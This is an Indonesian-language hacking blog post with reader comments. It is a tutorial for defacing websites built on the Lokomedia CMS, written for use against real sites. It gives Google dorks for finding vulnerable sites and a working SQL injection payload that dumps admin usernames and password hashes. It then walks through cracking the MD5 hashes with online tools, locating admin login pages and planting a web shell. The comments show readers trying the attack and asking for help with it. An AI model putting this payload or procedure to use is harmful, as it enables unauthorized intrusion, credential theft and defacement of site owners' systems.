Malem fanss :* Malem juga haters :p. Berandal update lagi nih :* Kali ini gw mau share Tutorial Cara Deface CMS Lokomedia. Gw bikin tutorial ini gara2 gw liat salah satu kiriman Master Web Lokomedia di grup FB Indonesia Defacer Tersakiti. Gw bingung gimana sih kok bisa dapet segitu banyak.
Oke, simak langsung aja ya tutorial deface web cms lokomedia :) .
Bahan :
1. Dork :
inurl:/statis-1-profil.htmlKembangin lagi biar dapet yg VULN + Perawan :p
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
Dork lengkap tunggu post selanjutnya :*
2. Exploit
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
3. MD5 Decrypter
KHUSUS MD5 DECRYPTER, LU DECRYPT PAKE OTAK LU NDIRI!
Bercanda :v Ada tools online nya kok :p
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/
Tutorial:
1. Dorking pake dork di atas.
2. Pilih salah satu target. Salah dua juga gapapa :v
3. Masukan injeksi nya.
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+Gatau caranya? :v Sini gw ajarin :p
http://site.co.li/statis-1-profil.html lu tambahin exploit nya sesudah angka. Jadinya gini:
http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
Baca juga: Install Websploit Termux
4. Kalo vuln jadinya bakal kek gini.
5. Tekan Ctrl+U trus copy MD5 nya ke MD5 Decrypter.
6. Tinggal cari admin page nya. Biasanya sih di:
http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur
7. Tanem shell? Use ur brain :) Jangan maunya disuapin mulu!
Baca juga: Tutorial Deface WP Themes Qualifire.
8. Akses shell? Klik kanan gambar yg ancur. trus 'Copy Image Location'.
9. Jan lupa pasang nick gw di Script lu :v Berandal & OWL SQUAD :)
Saran gw sih, jangan langsung injek web nya. Cari dulu admin login nya :) Biar gak sakit hati :P
Simak video gw dibawah :D (terdelete)
Okee, cukup ya tutor kali ini :D Kalo ada salah2 kata mohon maap :)
Sumber: Garuda Security Hacker dan TKJ Cyber Art
Regards,
Berandal. [OWL SQUAD]
kok agan gampang bener ya :v, ane gagal mulu pas bagian hash md5, selalu not found pas mau di decrypt di hashkiller / md5decrypt. solusi dong gan
ردحذفFaktor face :v, mungkin belum beruntung, atau kalo mau yha decrypt manual sendiri :D, atau gk yha asal nebak aj
حذفcoba cek http://idamnuriqbal.id apa ada kelemahannya gan masta, klu ada mohon info dmana letak kelemahannya. agar dapat saya perbaiki
ردحذفterima kasih.
ente pake CMS apa gan ?
حذفsorry min w numpang lewat doang :V
حذفedeh bocah 1 ni :'v cms gk ada web make blogger :'v pea
أزال المؤلف هذا التعليق.
حذفkalau login di cpanel suka salah nih
ردحذفpassword yg didapat dengan teknik sql lokomedia beda sama password cpanel gan :)
حذفjudul lagu videonya apa gan?
ردحذفbukannya diliatin pas aal video gan :D
حذفudh nemu vuln + id pw admin login udh ketemu ehh pas mau isi id pw admin malah gk ada :3
ردحذفID+Pass udah dapet, eh adminnya loginnya yg ribet dicari XD
ردحذفitu masalah utama sql lokmed ini hwhwh
حذفAne udah ke cpanel tpi waktu koneksi berahir mulu gan
حذفKok blank ya mas ? Udah berhasil semua , waktu masuk ke log-in admin udah dimasukin datanya kok blank ?
ردحذفNjemg Not Found semua :3
ردحذفCari admin loginnya very hard..
ردحذفada yg tau ini tipe hash apa?? c1717b01367691479191356d2ee376d7
ردحذفadmin login nya gimana nih :V pada ngilang gua liat di site site korban :V
ردحذفdi umpetin kali ya :V
ردحذفkampret
ردحذفLINK HALAMAN ADMIN LOGIN DIMANA? UDH KELILING GAK ADA TOMBOL LOGIN AKMJ
ردحذفunch unch :*
ردحذفberandal... aku ngefans sama berandal :*
Web Vulnnya berbentuk apa gan? Gw daritadi nyari pas masukin exploit 404 NOT FOUND
ردحذفMohon dijawab:)
Salken dari JAKARTA CYBER ARMY
إرسال تعليق
Komentar Spam Akan kami Hapus